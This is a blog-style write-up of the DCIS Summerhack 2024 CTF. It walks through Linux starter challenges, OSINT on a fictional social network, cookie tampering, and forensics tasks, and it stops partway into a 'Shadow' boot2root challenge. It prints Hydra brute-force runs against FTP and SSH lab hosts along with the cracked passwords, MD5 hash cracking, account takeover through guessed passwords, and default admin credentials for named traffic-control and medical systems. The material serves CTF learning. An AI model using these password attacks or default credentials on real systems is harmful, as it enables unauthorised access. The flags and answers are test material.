DCIS Summerhack 2024
I recently participated in the DCIS Summer Hack CTF event in July 2024, tackling various cybersecurity puzzles in categories like Boot2Root, Forensics, and Web Exploitation.
DCIS Summerhack 2024
I recently took part in the DCIS Summer Hack CTF event hosted by DCIS in July 2024. It was a fun and challenging competition where I tackled various cybersecurity puzzles and scenarios, including the categories like Boot2Root, Forensics, and Web Exploitation among others.
The starter category is pretty unexciting, so there aren’t many notes for these challenges as they are pretty self-explanatory.
The entire Misc category consisted of a series of challenges on a single website, peacook.hkn, which resembled a Facebook-like platform. The main objective was to use OSINT to gather intelligence on various fictional individuals and complete other “easy” tasks. The overall purpose of the series was to raise awareness about the type of information you share online and how it can be used against you. Most of the challenges in this category don’t have comprehensive notes because they were primarily visual.
I finished on first place with a score of 612 points.
List and read
Category - Starters
This is the first challenge in a series of how to linux challenges. Open your terminal and write ‘ssh user1@beginner.com’ and login with the password haaukins. list the home directory to get the name of flag file and read it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿kali)-[~]
└─$ ssh user1@beginner.com
██████╗ ███████╗ ██████╗ ██╗███╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██╔════╝██╔════╝ ██║████╗ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╗ ██║ ███╗██║██╔██╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔══██╗██╔══╝ ██║ ██║██║██║╚██╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██████╔╝███████╗╚██████╔╝██║██║ ╚████║██║ ╚████║███████╗██║ ██║
╚═════╝ ╚══════╝ ╚═════╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
Welcome to the linux beginner challenges!
Login with the following credentials.
OPS. No characters will show when you write the password.
Username: user1
Password: haaukins
user1@beginner.com's password:
You have successfully logged in to the beginner ssh server.
These challenges will take you through the basics of using the linux terminal.
For each challenge you complete, you will receive a flag.
Use the su command to switch between users on the machine ex. "su user2",
this will prompt you for the password for that user.
The Flag found on each user is the password for the next user.
user1@751dbd41e3a6:~$ cat flag1.txt
HKN{Be-yh-tkv4tb}
Use this flag as password to login to user2.
You can use the 'su user2' which will then prompt you for the password.
Flag: HKN{Be-yh-tkv4tb}
Hidden files
Category - Starters
Find a way to list hidden files within a directory, in this specific case, user2’s home directory. If you have not closed the ssh session login to user2 with the following command ‘su user2’. Use the flag from ‘List and read’ as the password.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
user1@751dbd41e3a6:~$ su user2
Password:
Find a way to list hidden files within a directory, in this specific case, user2's home directory.
Once you have found the flag, proceed to user3 with 'su user3'. Use the flag from this challenge as the password.
user2@751dbd41e3a6:~$ ls
user2@751dbd41e3a6:~$ ls -la
total 24
drwxr-xr-x 1 user2 user2 4096 Jul 4 17:36 .
drwxr-xr-x 1 root root 4096 Jul 6 2021 ..
-rw------- 1 user2 user2 10 Jul 4 17:36 .ash_history
-rw------- 1 user2 user2 18 Jul 4 17:30 .flag2.txt
-rw-r--r-- 1 root root 226 Jul 4 17:30 .profile
user2@751dbd41e3a6:~$ cat .flag2.txt
HKN{Xl-bn-CMXLHM}
Flag: HKN{Xl-bn-CMXLHM}
Grabbing information
Category - Starters
Searching through long pieces of text for specific information can be a pain. Search ‘longtext.txt’ for the flag prefix ‘HKN’, scrolling through the file wont be efficient here. Login to user3 with the flag from ‘Hidden files’ as password.
1
2
3
4
user2@751dbd41e3a6:~$ su user3
Password:
Searching through long pieces of text for specific information can be a pain. Search 'longtext.txt' for the flag prefix 'HKN', scrolling through the file wont be efficient here.
Once you have found the flag, proceed to user4 with 'su user4'. Use the flag from this challenge as the password.
1
2
3
user3@751dbd41e3a6:~$ grep 'HKN' longtext.txt
remember most of. All I remember is playing a keyboard at the store for some reason, and that the dream ended with a random car horn. Oh, and there was Minecraft involved in the beginning, which I'm pretty sure is becoming a recurring theme in my HKN{Ylh-es-vYDUV}. I don't know why that happened, because I rarely play Minecraft anymore. Do any of y'all remember the DVD screensaver meme? That was one of my favorite memes. For those who don't know what I'm talking about, many DVD players had this
Flag: HKN{Ylh-es-vYDUV}
Find the file
Category - Starters
Find a command which can search through directories for specific files. The file to be searched for is ‘findme.txt’. Search the whole system AKA ‘/’. Login to user4 with the flag from ‘Grabbing information’ as password.
grep -r 'findme.txt' /
1
2
3
4
5
6
...
/etc/cont-init.d/20-config:printf "$APP_FLAG4\n" > /tmp/findme.txt
/etc/cont-init.d/20-config:chown user4:user4 /tmp/findme.txt
/etc/cont-init.d/20-config:chmod 600 /tmp/findme.txt
/etc/cont-init.d/20-config:echo "printf \"Find a command which can search through directories for specific files. The file to be searched for is 'findme.txt'. Search the whole system AKA '/'. \nOnce you have found the flag, proceed to user5 with 'su user5'. Use the flag from this challenge as the password.\n\"" >> /home/user4/.profile
...
1
2
user4@751dbd41e3a6:~$ cat /tmp/findme.txt
HKN{bM-Ha-i5eWIc}
Flag: HKN{bM-Ha-i5eWIc} —
Copying files
Category - Starters
Copying files is an important task ex. to create backups. Copy ‘flag5.txt’ from ‘/root/’ into your home directory to be able to read it. Login to user5 with the flag from ‘Find the file’ as password.
1
2
3
4
user4@751dbd41e3a6:~$ su user5
Password:
Copying files is an important task ex. to create backups. Copy 'flag5.txt' from '/root/' into your home directory to be able to read it.
Once you have found the flag, proceed to user6 with 'su user6'. Use the flag from this challenge as the password.
1
2
3
4
5
6
user5@751dbd41e3a6:~$ cp /root/flag5.txt .
user5@751dbd41e3a6:~$ ls
flag5.txt
user5@751dbd41e3a6:~$ cat flag5.txt
HKN{cit-zc-GZiww}
Flag: HKN{cit-zc-GZiww}
Moving files
Category - Starters
Moving files in linux can not only be used to move files but also rename them. Move ‘flag6.txt’ from ‘/root/’ into your home directory and read it. Login to user6 with the flag from ‘Copying files’ as password.
1
2
3
4
5
6
7
8
9
10
user5@751dbd41e3a6:~$ su user6
Password:
Moving files in linux can not only be used to move files but also rename them. Move 'flag6.txt' from '/root/' into your home directory and read it.
Once you have found the flag, proceed to user7 with 'su user7'. Use the flag from this challenge as the password.
user6@751dbd41e3a6:~$ mv /root/flag6.txt .
user6@751dbd41e3a6:~$ ls
flag6.txt
user6@751dbd41e3a6:~$ cat flag6.txt
HKN{7WE-nyN-vUtl}
Flag: HKN{7WE-nyN-vUtl}
File permissions
Category - Starters
In some cases you will have to change the permissions of a file/directory to achieve your goals. To be able to read the flag in your home dir, change it’s permissions. Login to user7 with the flag from ‘Moving files’ as password.
1
2
3
4
5
user6@751dbd41e3a6:~$ su user7
Password:
In some cases you will have to change the permissions of a file/directory to achieve your goals. To be able to read the flag in your home dir, change it's permissions.
Once you have found the flag, proceed to user8 with 'su user8'. Use the flag from this challenge as the password.
1
2
3
4
5
6
7
8
user7@751dbd41e3a6:~$ ls
flag7.txt
user7@751dbd41e3a6:~$ cat flag7.txt
cat: flag7.txt: Permission denied
user7@751dbd41e3a6:~$ chmod 777 flag7.txt
user7@751dbd41e3a6:~$ cat flag7.txt
HKN{ZO5-B6b-v6BX}
Flag: HKN{ZO5-B6b-v6BX}
Executing custom binaries
Category - Starters
Executing custom binaries is not like writing commands. Find a way to execute the flag8 binary within your home dir. Login to user8 with the flag from ‘Changing file/directory permissions’ as password.
1
2
3
4
5
6
7
8
9
10
11
user7@751dbd41e3a6:~$ su user8
Password:
Executing custom binaries is not like writing commands. Find a way to execute the flag8 binary within your home dir.
This is the final flag for this series of challenges. Well Done!!.
user8@751dbd41e3a6:~$ ls
flag8
user8@751dbd41e3a6:~$ ./flag8
-ash: ./flag8: Permission denied
user8@751dbd41e3a6:~$ chmod 777 flag8
user8@751dbd41e3a6:~$ ./flag8
HKN{ms-CLh-lLUUB}
Flag: HKN{ms-CLh-lLUUB}
Private Comments
Category - Web exploitation
Jeg er ved at lave et nyt portfolio med mine bedste projekter og designs, kan du give mig en kommentar? Tjek min side: http://johan-flagworth.hkn
There wasn’t anything interesting on the webpage itself, so one of the first things to do after that is to check the source file of the webpage, I quickly spotted the commented section and just digged a little deeper into the css file instead.
1
2
3
4
5
6
7
8
...
<!-- Template Main JS File -->
<script src="assets/js/main.js"></script>
<!-- Hmmmm, nothing interesting in this file, where could it be??? -->
</body>
</html>
style.css
1
2
3
4
5
6
7
/**
* Template Name: MyPortfolio - v4.9.1
* Template URL: https://bootstrapmade.com/myportfolio-bootstrap-portfolio-website-template/
* Author: BootstrapMade.com
* License: https://bootstrapmade.com/license/
* Flag: DDC{4lw4ys_ch3ck_c0pyr1ght_4nd_cr3d1t5}
*/
Flag: DDC{4lw4ys_ch3ck_c0pyr1ght_4nd_cr3d1t5}
Anonymous sandworms - 1
Category - Misc
We suspect that the recent robbery on Wetcompany has been done by the group of criminals called “Anonymous sandworms”. So far investigations shows that they might use peacock.hkn/ as a platform to communicate. We need you to find the real identity of criminal Mister Beef. Go to peacock.hkn/ and find out.
Flag format: HKN{Firstname_FathersFirstname_BrothersFirstname} Ex HKN{Lars_Peter_Knud}
Intelligence gathered:
1
2
3
4
5
Mister beef:
name : Miguel
brother: Benjamin Jensen
father: John Jensen
Flag: HKN{Miguel_John_Benjamin}
Anonymous sandworms - 2
Category - Misc
Good job identifying this fella! Unfortunately he doesn’t have an address in our system! Please help us find out where he is staying at the moment. We need to catch him before the next robbery! Go to peacock.hkn/ and find out.
Flag format: HKN{city_streetname} Ex HKN{greve_strand_grevehaven}
I downloaded the image where the girlfriend said she was “enjoying our current stay with my BF. Travel lift.” In a previous post, Mister Beef’s girlfriend stated she was his girlfriend.
I reverse searched the image on Google Images and found the place.
Flag: HKN{vesterø_havn_havnebakken}
Anonymous sandworms - 3
Category - Misc
Great job on profiling the criminal Mister Beef! New intel tells us that he might use his girlfriends account to communicate with the other members of Anonymous sandworms. Go to peacock.hkn/ and obtain access to her account so we can find out.
From random vacation comment: Gina email: ginababe@hmail.hkn
A guy named Kristian writes: Fun fact! Most people uses pet’s name for their passwords and then adds an ! when it has to be hard to guess!
A comment from Mister Beef brothers: @gina that would be you!
She responded: Yes, even the the fact about the petname+!
Another post from Gina picturing a pet dog: Gina: Our dear Nina has finally moved in!
Login to the user account belonging to Gina using the following credentials:
User: ginababe@hmail.hkn Password: nina!
Found the flag on her main profile page.
Flag: HKN{gv-fd-5PvJ9V}
The golden seagull
Category - Misc
Someone from Anonymous sandworms has stolen the very valuable painting “The Golden Seagull”. Please go to peacock.hkn/ and help us locate the painting. The culprit might “exif” it in a one of a kind restaurant.
I downloaded a seagull picture from the website, which stating to the description I should used the exiftool on.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
┌──(kali㉿kali)-[~/Downloads]
└─$ exiftool seagull.jpg
ExifTool Version Number : 12.76
File Name : seagull.jpg
Directory : .
File Size : 98 kB
File Modification Date/Time : 2024:07:04 15:45:14-04:00
File Access Date/Time : 2024:07:04 15:45:15-04:00
File Inode Change Date/Time : 2024:07:04 15:45:14-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Exif Byte Order : Little-endian (Intel, II)
Orientation : Horizontal (normal)
X Resolution : 300
Y Resolution : 300
Resolution Unit : inches
Software : GIMP 2.10.32
Modify Date : 2022:10:18 10:07:52
Color Space : sRGB
Exif Image Width : 843
Exif Image Height : 597
GPS Version ID : 2.3.0.0
GPS Latitude Ref : North
GPS Longitude Ref : West
Subfile Type : Reduced-resolution image
Compression : JPEG (old-style)
Photometric Interpretation : YCbCr
Samples Per Pixel : 3
Thumbnail Offset : 466
Thumbnail Length : 5778
XMP Toolkit : XMP Core 4.4.0-Exiv2
Document ID : gimp:docid:gimp:89f14806-cbc8-4daa-a783-c6e51a21d6b6
Instance ID : xmp.iid:6bf3dc57-ffc6-45bb-884e-f8ce6c48ab27
Original Document ID : xmp.did:7ba87cc8-c414-40fa-b5ae-a06a6c77d3fd
Format : image/jpeg
Api : 2.0
Platform : Mac OS
Time Stamp : 1666080489702340
Version : 2.10.32
Creator Tool : GIMP 2.10
Metadata Date : 2022:10:18T10:07:52+02:00
History Action : saved
History Changed : /
History Instance ID : xmp.iid:ec1408d6-04dc-438a-a29f-ff6a2a6412f9
History Software Agent : Gimp 2.10 (Mac OS)
History When : 2022:10:18 10:08:09+02:00
Profile CMM Type : Little CMS
Profile Version : 4.3.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2022:10:18 07:49:40
Profile File Signature : acsp
Primary Platform : Apple Computer Inc.
CMM Flags : Not Embedded, Independent
Device Manufacturer :
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Little CMS
Profile ID : 0
Profile Description : GIMP built-in sRGB
Profile Copyright : Public Domain
Media White Point : 0.9642 1 0.82491
Chromatic Adaptation : 1.04788 0.02292 -0.05022 0.02959 0.99048 -0.01707 -0.00925 0.01508 0.75168
Red Matrix Column : 0.43604 0.22249 0.01392
Blue Matrix Column : 0.14305 0.06061 0.71393
Green Matrix Column : 0.38512 0.7169 0.09706
Red Tone Reproduction Curve : (Binary data 32 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 32 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 32 bytes, use -b option to extract)
Chromaticity Channels : 3
Chromaticity Colorant : Unknown
Chromaticity Channel 1 : 0.64 0.33002
Chromaticity Channel 2 : 0.3 0.60001
Chromaticity Channel 3 : 0.15001 0.06
Device Mfg Desc : GIMP
Device Model Desc : sRGB
Image Width : 843
Image Height : 597
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 843x597
Megapixels : 0.503
Thumbnail Image : (Binary data 5778 bytes, use -b option to extract)
GPS Latitude : 19 deg 55' 1.40" N
GPS Longitude : 75 deg 8' 19.14" W
GPS Position : 19 deg 55' 1.40" N, 75 deg 8' 19.14" W
Converted the GPS position to decimal coordinates: 19.9171, -75.1386 using ChatGPT
Inserted the coordinates into Google Maps and found the place.
Flag: HKN{cuba_ackerman_rd}
The Cultural Code
Category - Misc
A certain important “mister important” on peacock.hkn/ is going to a cultural event. But the tickets might be fake. Go to peacock.hkn/ and find out.
I found a picture of two concert tickets and then scanned the QR code on one of them to get the flag.
Flag: HKN{THE4TOR-CULTUR3}
The Yellow Snitch
Category - Misc
Office spaces can be filled with interesting information. The yellow snitches are always ready to share. Go to peacock.hkn/ and see if you can find any.
I zoomed in on a picture of a man sitting in an office space and found the username and password written on a yellow Post-it note.
Login to the user account belonging to Jens using the following credentials:
User: jens@hmail.hkn Password: YENEX2EC
Found the flag on her main profile page.
Flag: HKN{wKF-FnB-LxME}
Miss Rockies codes
Category - Misc
Miss Rockie is a very structure person. He has a list of all his upcoming tasks and activities for each week. However, he is also very active on social media and share his schedules with his friends. This time he has shared something very important. Go to peacock.hkn/ obtain access to Miss Rockies user.
I found a md5 hash on a Post-it note: 329670c3265b6ccd392e622733e9772f which equals to my password by using crackstation.net to crack the md5 hash.
The email is located on the screen in the picture: email@rock.com
Login as the user “Miss Rockie”
Flag: HKN{pQC-vK-2VhV7}
John’s wierd comment
Category - Misc
Go to peacock.hkn/ and see if you can decode Johns weird comment.
The comment: SEtOezVMaS1USy1Ub0k2UH0=
Decoded the base64 string using cyberchef.io
Flag: HKN{5Li-TK-ToI6P}
The hash hack
Category - Misc
Someone from the criminal organisation is recrouting new members for the organisation. We need your help to get through the recruitment challenges. Go to peacock.hkn/ and decrypt the riddle.
From a comment: Now recruiting for anonymous sandworms! We would like to offer a position to who ever is able to crack the code for Febrinas account!: the md-5 hash is: 505c7c48ac6dc1edc9b08f21db5a571d
I used once again crackstation to crack the md5 hash which was equal to sunbird
I found Febrinas email on her profile page
login and located the flag
Flag: HKN{tGq-Cx-Hb9PM}
The suitcase
Category - Misc
Mister beef is showing off his recent haul. Maybe a forensic tool like binwalk can help us find out what where he hid the money. Go to peacock.hkn/ and see if you can find out!
Found a picture of a suitcase full of money and downloaded the file beef2.jpg I used the tool Binwalk to see if there were any other files hidden in the jpg file
1
2
3
4
5
6
7
8
9
10
11
──(kali㉿kali)-[~/Downloads]
└─$ binwalk beef2.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
209619 0x332D3 Zip archive data, at least v1.0 to extract, compressed size: 20, uncompressed size: 20, name: flag.txt
209705 0x33329 Zip archive data, at least v1.0 to extract, compressed size: 33, uncompressed size: 33, name: info.txt
209804 0x3338C Zip archive data, at least v2.0 to extract, compressed size: 51, uncompressed size: 59, name: other.txt
210157 0x334ED End of Zip archive, footer length: 22
I extracted the files using the command binwalk -e beef2.jpg
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Downloads]
└─$ binwalk -e beef2.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
209619 0x332D3 Zip archive data, at least v1.0 to extract, compressed size: 20, uncompressed size: 20, name: flag.txt
209705 0x33329 Zip archive data, at least v1.0 to extract, compressed size: 33, uncompressed size: 33, name: info.txt
209804 0x3338C Zip archive data, at least v2.0 to extract, compressed size: 51, uncompressed size: 59, name: other.txt
210157 0x334ED End of Zip archive, footer length: 22
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Downloads]
└─$ cd _beef2.jpg.extracted
┌──(kali㉿kali)-[~/Downloads/_beef2.jpg.extracted]
└─$ ls
332D3.zip flag.txt info.txt other.txt
┌──(kali㉿kali)-[~/Downloads/_beef2.jpg.extracted]
└─$ cat flag.txt
HKN{W41Kin_Th3_B1n}
Flag: HKN{W41Kin_Th3_B1n}
Miss Rockies Graduation
Category - Misc
Miss Rockie is so happy to defend her PHD. She is so proud of her achievements! Se if you can find her CPR number and date of graduation. Go to peacock.hkn/ and find out.
Flag format: HKN{date_cpr} EX: HKN{22012022_080904-8843}
Found the picture on the website and zoomed in on it and it revealed the info:
Flag: HKN{11012022_010134-5678}
Scada Strange Love
Category - Operational Technologies
Siemens ST950, a 3rd gen traffic control system, faces a cyber threat. Assume the role of an attacker aiming chaos within its system. You’re a cyber attacker aiming to cause chaos and manipulate the traffic control system. You can reach the admin login for Siemens ST950 traffic control, but a password blocks access. You only know that SCADA is a strange love.
Found the default credentials on a random website by google dorking.
Flag: HKN{root:zP2wxY4uE}
Operational Tech Quest - Medical device
Category - Operational Technologies
One of the primary challenges in OT security is the prevalence of weak and default passwords. Insecure credentials can lead to unauthorized access, potentially jeopardizing the integrity and safety of critical systems. As a cybersecurity expert, you’ve been tasked with investigating a breach of the ClinicPro EMR system, a medical device that stores sensitive patient information. Your mission is to identify the credentials and secure the system to prevent further data breaches. The format of the flag is as follows: HNK{username:password}. Good luck in your quest to secure the OT world and discover the hidden flags!”
This challenge is a OSINT challenge, which stand for Open Source Intelligence which is indicated from the description. It seems that we are looking for default credentials to a device called ClinicPRO EMR System.
After a quick Google search for clinicpro emr system default username and password the very first search result return the solution for the challenge.
1
2
3
4
5
6
7
8
ClinicPro ClinicPro EMR Login Guide
- Open your web browser (e.g. Chrome, Firefox, Opera or any other browser)
- Click [HERE](http://my-router-ip.192-168-1-1-ip.co/) to auto detect your router IP. After some seconds our tool will show a link to your router login page. Click on the shown link.
- You should see 2 text fields where you can enter a username and a password.
- The default username for your ClinicPro ClinicPro EMR is admin.
The default password is abc123.
- Enter the username & password, hit "Enter" and now you should see the control panel of your router.
So from this info we can get the flag
Flag: HNK{admin:abc123}
Operational Tech Quest - ICS
Category - Operational Technologies
What is Operational Technology (OT)? Operational Technology, commonly known as OT, refers to the hardware and software used to monitor and control physical processes, devices, and infrastructure in various industrial sectors. It plays a vital role in critical infrastructure, such as energy, manufacturing, and healthcare. Briefly Defined Components:
SCADA (Supervisory Control and Data Acquisition): A centralized control system used to manage and monitor industrial processes. PLC (Programmable Logic Controller): A specialized computer for industrial automation, used to control machinery and processes. RTU (Remote Terminal Unit): A device that connects remote sensors and controls to a central system. HMI (Human-Machine Interface): The interface between humans and machines, allowing operators to interact with industrial processes. In the realm of OT, you’ll frequently encounter the term “ICS”. Your first challenge is to uncover the hidden meaning behind “ICS”.
This challenge is a simple riddle, find out what ICS stand for and insert it as the flag.
When you search for Operational technology ICSin Google, the first respond is:
1
Industrial control systems (ICS) are a main component of operational technology. ICS includes different types of devices, systems, controls, and networks that manage a variety of industrial processes. The most common are supervisory control and data acquisition (SCADA) systems and distributed control systems (DCS).
We can then assume that ICS stand for Industrial Control Systems - the difficult part of this challenge is to find how out how to format the flag. I just went through a lot of trial and error and eventually got the flag.
Flag: HKN{industrial_control_systems}
Premium Cookies
Category - Web Exploitation
Du vil gerne imponere landsbyens ældste i den årlige bake-off. Heldigvis fortalte din ven dig om denne hemmelige opskrift på småkager. Kan du finde den på best-recipes.hkn?
Edit the cookie containing the user-type data from the md5 hash of ‘non-premium’ (85a27b4940445bdce6cc15b7d0dc6873) to ‘premium’ (a288195832f8717bca4671416014a464)
Go to the site: http://best-recipes.hkn/article_id=4 and locate the flag:
Flag: DDC{2_cups_of_sugar}
Flag Transfer Protocol
Category - Forensics
Er der mon en “admin” der har en port åben for at overføre filer? Og har han mon tænkt over at John lurer i skyggerne?
First I started by scanning the network I was connected to:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(kali㉿kali)-[~]
└─$ nmap 77.112.37.0/24 -p 20,21
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-04 16:45 EDT
Nmap scan report for 77.112.37.1
Host is up (0.016s latency).
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp closed ftp
Nmap scan report for 77.112.37.2
Host is up (0.016s latency).
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp closed ftp
Nmap scan report for 77.112.37.3
Host is up (0.017s latency).
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp closed ftp
Nmap scan report for 77.112.37.217
Host is up (0.016s latency).
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.59 seconds
Based on the challenge description, it is plausible that the username is ‘admin’. We can use the rockyou.txt file with Hydra against the FTP service.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 77.112.37.217 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-04 16:51:27
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://77.112.37.217:21/
[STATUS] 288.00 tries/min, 288 tries in 00:01h, 14344111 to do in 830:06h, 16 active
[STATUS] 288.00 tries/min, 864 tries in 00:03h, 14343535 to do in 830:04h, 16 active
[21][ftp] host: 77.112.37.217 login: admin password: phantom
[STATUS] 2049199.86 tries/min, 14344399 tries in 00:07h, 1 to do in 00:01h, 15 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-04 16:58:38
After gaining access, simply transfer the flag and use the cat command to display it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~]
└─$ ftp admin@77.112.37.217
Connected to 77.112.37.217.
220 pyftpdlib 1.5.9 ready.
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||21013|).
125 Data connection already open. Transfer starting.
-rw-rw-rw- 1 root root 221251 Apr 03 07:48 flag.jpg
-rw-rw-rw- 1 root root 111879 Apr 03 07:48 flag.png
-rw-rw-rw- 1 root root 34 Apr 03 07:48 flag.txt
226 Transfer complete.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering extended passive mode (|||21007|).
125 Data connection already open. Transfer starting.
100% |***************************************************************************************************************************************************| 34 157.36 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (87.60 KiB/s)
ftp> exit
221 Goodbye.
1
2
3
┌──(kali㉿kali)-[~]
└─$ cat flag.txt
DDC{Keeping-track-of-all-my-flags}
Flag: DDC{Keeping-track-of-all-my-flags}
Rocking SSH
Category - Forensics
See if you can find a rocking way to find the credentials for the user john on rockingssh.com.
This challenge is very similar to ‘Flag Transfer Protocol’, but instead of using the FTP protocol, it uses SSH.
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Downloads]
└─$ nmap 77.112.37.185
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-04 17:09 EDT
Nmap scan report for rockingssh.com (77.112.37.185)
Host is up (0.015s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~/Downloads]
└─$ hydra -l john -P /usr/share/wordlists/rockyou.txt 77.112.37.185 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-04 17:09:53
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://77.112.37.185:22/
[STATUS] 156.00 tries/min, 156 tries in 00:01h, 14344245 to do in 1532:31h, 14 active
[22][ssh] host: 77.112.37.185 login: john password: johncena
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-04 17:12:37
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/Downloads]
└─$ ssh john@77.112.37.185
The authenticity of host '77.112.37.185 (77.112.37.185)' can't be established.
ED25519 key fingerprint is SHA256:UCzfwBLwQxzEHg84D9Rhj7UWUAViF6U912BuE/1mEc0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '77.112.37.185' (ED25519) to the list of known hosts.
██████╗ ██████╗ ██████╗██╗ ██╗██╗███╗ ██╗ ██████╗ ███████╗███████╗██╗ ██╗
██╔══██╗██╔═══██╗██╔════╝██║ ██╔╝██║████╗ ██║██╔════╝ ██╔════╝██╔════╝██║ ██║
██████╔╝██║ ██║██║ █████╔╝ ██║██╔██╗ ██║██║ ███╗ ███████╗███████╗███████║
██╔══██╗██║ ██║██║ ██╔═██╗ ██║██║╚██╗██║██║ ██║ ╚════██║╚════██║██╔══██║
██║ ██║╚██████╔╝╚██████╗██║ ██╗██║██║ ╚████║╚██████╔╝ ███████║███████║██║ ██║
See if you can find a rocking way to find the credentials for the user john.
john@77.112.37.185's password:
Congratulations you successfully found the password now just use cat to read the flag from flag.txt
1113cc888c56:~$ ls
flag.txt
1113cc888c56:~$ cat flag.txt
HKN{6YU-Il-fmgIt}
Flag: HKN{6YU-Il-fmgIt}
Shadow
Category - Boot2Root
Jeg har lavet en ssh server sådan at jeg kan dele den med alle! Det er bare så super hyggeligt at dele. Men i må altså gerne lige lade være med at rode rundt. Jeg er ikke helt sikker på at jeg har styr på alle tilladelser endnu.
Brug kommandoen ssh user1@shadow.hkn for at komme igang. Koden er start.
Since the name of the challenge is ‘Shadow’, I assumed it had something to do with the shadow file on a Linux system, which holds the hash values of user passwords.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
──(kali㉿kali)-[~/Downloads]
└─$ ssh user1@shadow.hkn
The authenticity of host 'shadow.hkn (77.112.37.36)' can't be established.
ED25519 key fingerprint is SHA256:Lsp6FKZeNmuUICUdtqEvFELTHWKQ9RRDHaeXwdgX/tk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'shadow.hkn' (ED25519) to the list of known hosts.
/$$ /$$ /$$
| $$ /$ | $$ | $$
| $$ /$$$| $$ /$$$$$$ | $$ /$$$$$$$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$
| $$/$$ $$ $$ /$$__ $$| $$ /$$_____/ /$$__ $$| $$_ $$_ $$ /$$__ $$
| $$$$_ $$$$| $$$$$$$$| $$| $$ | $$ \ $$| $$ \ $$ \ $$| $$$$$$$$
| $$$/ \ $$$| $$_____/| $$| $$ | $$ | $$| $$ | $$ | $$| $$_____/
| $$/ \ $$| $$$$$$$| $$| $$$$$$$| $$$$$$/| $$ | $$ | $$| $$$$$$$
|__/ \__/ \_______/|__/ \_______/ \______/ |__/ |__/ |__/ \_______/
I made this server so that people could read the files on my computer.
